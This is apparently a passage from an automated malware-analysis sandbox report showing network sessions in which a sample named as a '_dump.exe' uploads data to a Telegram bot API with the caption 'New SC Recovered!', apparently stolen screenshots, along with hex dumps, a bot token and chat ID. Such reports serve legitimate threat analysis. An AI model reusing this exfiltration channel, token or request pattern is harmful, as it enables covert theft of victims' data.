20 30 37 2f 30 33 2f 32 30 32 34 20 30 34 3a 31 34 3a 33 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc9b180ffd53ffContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dc9b180ffd53ffContent-Disposition: form-data; name="caption"New SC Recovered!Time: 07/03/2024 04:14:35User
                                                2024-05-17 23:38:15 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:38:15 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:38:15 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:38:15 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:38:15 UTC1409OUTData Raw: 03 e7 da 28 a2 b5 30 36 f4 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8 5c 85 3e a0 f6 fc 28 d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 4a 4a 2c 17 0a 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb
                                                Data Ascii: (06OgcX/a\>(I=-`pJJ,(Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN
                                                2024-05-17 23:38:15 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 62 31 38 30 66 66 64 35 33 66 66 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9b180ffd53ff--
                                                2024-05-17 23:38:15 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:38:16 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:16 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.449744149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:38:23 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9f5b252489fb
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:23 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:38:23 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 66 35 62 32 35 32 34 38 39 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 66 35 62 32 35 32 34 38 39 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 30 38 2f 32 30 32 34 20 31 34 3a 31 34 3a 35 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc9f5b252489fbContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dc9f5b252489fbContent-Disposition: form-data; name="caption"New SC Recovered!Time: 07/08/2024 14:14:59User
                                                2024-05-17 23:38:23 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:38:23 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:38:23 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:38:23 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:38:23 UTC1409OUTData Raw: 03 e7 da 28 a2 b5 30 36 f4 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8 5c 85 3e a0 f6 fc 28 d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 4a 4a 2c 17 0a 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb
                                                Data Ascii: (06OgcX/a\>(I=-`pJJ,(Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN
                                                2024-05-17 23:38:23 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 66 35 62 32 35 32 34 38 39 66 62 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9f5b252489fb--
                                                2024-05-17 23:38:24 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:24 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.449745149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:38:37 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dca59a756be172
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:37 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 39 61 37 35 36 62 65 31 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 39 61 37 35 36 62 65 31 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 31 36 2f 32 30 32 34 20 31 33 3a 31 33 3a 31 34 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dca59a756be172Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dca59a756be172Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/16/2024 13:13:14User
                                                2024-05-17 23:38:37 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:38:37 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:38:37 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:38:37 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:38:37 UTC1409OUTData Raw: 03 e7 da 28 a2 b5 30 36 f4 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8 5c 85 3e a0 f6 fc 28 d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 4a 4a 2c 17 0a 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb
                                                Data Ascii: (06OgcX/a\>(I=-`pJJ,(Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN
                                                2024-05-17 23:38:37 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 39 61 37 35 36 62 65 31 37 32 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dca59a756be172--
                                                2024-05-17 23:38:37 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:38:38 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:38 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
